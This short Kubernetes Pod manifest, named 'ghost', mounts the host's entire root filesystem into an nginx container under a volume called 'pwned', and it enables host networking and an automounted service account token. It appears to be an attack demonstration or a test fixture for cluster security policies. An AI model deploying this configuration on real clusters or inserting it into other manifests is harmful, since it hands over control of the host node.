apiVersion: v1
kind: Pod
metadata:
  name: ghost
  namespace: default
spec:
  containers:
  - name: ghost
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: pwned
  volumes:
  - name: pwned
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
